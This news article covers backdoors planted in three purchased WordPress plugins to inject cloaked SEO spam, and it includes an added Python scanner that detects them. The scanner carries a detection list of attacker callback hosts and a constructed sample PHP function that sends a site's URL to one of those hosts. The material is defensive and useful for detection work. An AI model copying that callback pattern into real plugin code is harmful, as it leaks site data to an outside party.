The massive size of the WordPress plugin ecosystem is starting to show signs of rot, as yet another incident has been reported involving the sale of old, abandoned plugins to new owners who immediately add a backdoor to the original code.
The WordPress security team has intervened and removed all three plugins from the official WordPress Plugins Directory. WordPress security firm Wordfence discovered the three backdoors. Details about the backdoored plugins, the release in which the backdoor first appeared, and the remote host each one contacts are given in the table below.
| Plugin Name | Active Installs | Backdoor Added | Calls to | Removed by WP Team |
| --- | --- | --- | --- | --- |
| Duplicate Page and Post | 50,000+ | v2.1.0 (August 2017) | cloud-wp.org | December 14, 2017 |
| No Follow All External Links | 9,000+ | v2.1.0 (April 2017) | cloud.wpserve.org | December 19, 2017 |
| WP No External Links | 30,000+ | v4.2.1 (July 2017) | wpconnect.org | December 22, 2017 |
Backdoor tied to the same threat actor
The backdoor code in all three plugins works in a very similar way: it calls out to a remote server and inserts content and links returned by that server into the affected sites. Experts believe the backdoor is used to inject hidden SEO spam (cloaked links, shown to search engine crawlers but not to ordinary visitors) on affected sites to improve the search ranking of other sites.
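As an added example (not Wordfence's tooling or code from the page), the following Python script turns the indicators from the table above into a simple scan of a `wp-content/plugins` directory. It parses each plugin's WordPress header comment for `Plugin Name` and `Version`, flags the three named plugins at or above the release in which the backdoor appeared, and flags any PHP file that references one of the three callback hosts. The sample plugin embedded at the bottom is constructed for the demonstration; its `wpnel_check()` function and file layout are invented and are not the real backdoor code.

```python
import re
from pathlib import Path

# Indicators taken from the table above: plugin name -> (first backdoored
# release, remote host the backdoor calls). Assumption: every release at or
# above the listed one is suspect, since the plugins were later removed
# rather than cleaned.
BACKDOORED = {
    "Duplicate Page and Post": ("2.1.0", "cloud-wp.org"),
    "No Follow All External Links": ("2.1.0", "cloud.wpserve.org"),
    "WP No External Links": ("4.2.1", "wpconnect.org"),
}
CALLBACK_HOSTS = {host for _, host in BACKDOORED.values()}

# WordPress plugin headers are "Key: value" lines inside the leading comment
# block of the plugin's main PHP file, e.g. " * Plugin Name: Foo".
HEADER_RE = re.compile(
    r"^[ \t/*#@]*(Plugin Name|Version):[ \t]*(.+?)[ \t]*$", re.M
)


def parse_header(php_source):
    """Return {'Plugin Name': ..., 'Version': ...} found in the header comment."""
    return dict(HEADER_RE.findall(php_source[:8192]))


def version_key(version):
    """Turn '2.1.0' or '4.2.1-beta' into a tuple that compares numerically."""
    return tuple(int(p) if p.isdigit() else 0 for p in re.split(r"[.\-]", version))


def scan_plugin(files):
    """Scan one plugin given as {relative_path: php_source}.

    Returns a list of findings; an empty list means no indicator matched.
    """
    findings = []
    name = version = None
    for path, src in files.items():
        hdr = parse_header(src)
        if name is None and "Plugin Name" in hdr:
            name, version = hdr["Plugin Name"], hdr.get("Version")
        for host in CALLBACK_HOSTS:
            if host in src:
                findings.append(f"{path}: references known callback host {host}")
    if name in BACKDOORED and version:
        bad_from, _ = BACKDOORED[name]
        if version_key(version) >= version_key(bad_from):
            findings.append(
                f"{name} {version}: at or above first backdoored release {bad_from}"
            )
    return findings


def scan_plugins_root(root):
    """Walk a real wp-content/plugins directory; return {plugin_dir: findings}."""
    report = {}
    for plugin_dir in sorted(p for p in Path(root).iterdir() if p.is_dir()):
        files = {
            str(f.relative_to(plugin_dir)): f.read_text(errors="replace")
            for f in plugin_dir.rglob("*.php")
        }
        hits = scan_plugin(files)
        if hits:
            report[plugin_dir.name] = hits
    return report


# Constructed sample plugin: a header in the WordPress format plus an
# invented helper that contacts one of the hosts from the table.
SAMPLE_PLUGIN = {
    "wp-no-external-links.php": (
        "<?php\n/*\nPlugin Name: WP No External Links\nVersion: 4.2.1\n*/\n"
    ),
    "inc/update.php": (
        "<?php\nfunction wpnel_check() {\n"
        "    return wp_remote_get('http://wpconnect.org/?u=' . urlencode(home_url()));\n"
        "}\n"
    ),
}

if __name__ == "__main__":
    for finding in scan_plugin(SAMPLE_PLUGIN):
        print(finding)
```

Run `scan_plugins_root('/var/www/html/wp-content/plugins')` against a real install to get a per-plugin report. A hit on the version check alone means the plugin should be removed on the strength of the table above; a hit on a callback host in an unrelated plugin is worth a manual look, because the same actor could reuse the infrastructure.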
Wordfence experts believe the same actor is behind all three plugins. They based their conclusion on a series of discoveries they made while analyzing the malicious plugins and how they operated:
- The same company (Orb Online) paid for the acquisition of the first and second plugins.
- The purchase solicitations emailed to the owners of the second and third plugins used a similar template.
- All three plugins were purchased by newly created WordPress.org user accounts.
- The backdoor code was similar in all three plugins.
This type of incident is becoming common
This is not the first time Wordfence has uncovered a large operation to buy old WordPress plugins and add a backdoor that injects SEO spam on the websites using them.
Previously, Wordfence tied the purchase and backdooring of several plugins to a UK man named Mason Soiza, whom Wordfence linked to backdoors in plugins such as Captcha (300,000+ installs), Display Widgets (200,000+ installs), and 404 to 301 (70,000 installs).
Fellow WordPress security firm White Fir Design recently pointed out that backdoored plugins often linger on affected sites for years. For example, three years after 14 plugins carrying a similar SEO-spam backdoor were discovered, hundreds of (most likely abandoned) WordPress sites are still running one of them.